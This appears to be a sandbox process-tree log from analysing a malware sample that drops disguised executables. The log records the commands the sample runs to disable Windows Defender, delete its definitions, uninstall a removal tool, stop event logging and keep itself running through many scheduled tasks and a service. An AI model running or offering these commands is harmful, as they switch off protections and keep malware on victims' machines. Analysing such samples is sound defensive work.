C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows NT\TableTextService\unsecapp.exe"C:\Program Files\Windows NT\TableTextService\unsecapp.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Users\Default User\dllhost.exe"C:\Users\Default User\dllhost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"2⤵
- Executes dropped EXE
-
C:\Webdriversession\cmd.exeC:\Webdriversession\cmd.exe2⤵
- Executes dropped EXE
-
C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"2⤵
- Executes dropped EXE
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Vape.exe"C:\Users\Admin\AppData\Local\Temp\Vape.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Webdriversession\Intoref.exe"C:\Webdriversession\Intoref.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wo1j4pKD13.bat"7⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QHRAJGDI"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All6⤵
- Deletes Windows Defender Definitions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All6⤵
- Deletes Windows Defender Definitions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Microsoft_WindowsDefender"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCF78.tmp.bat""4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "scs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sc" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "scs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Webdriversession\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\ELS\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Globalization\ELS\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Windows\Globalization\ELS\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Webdriversession\cmd.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exeC:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
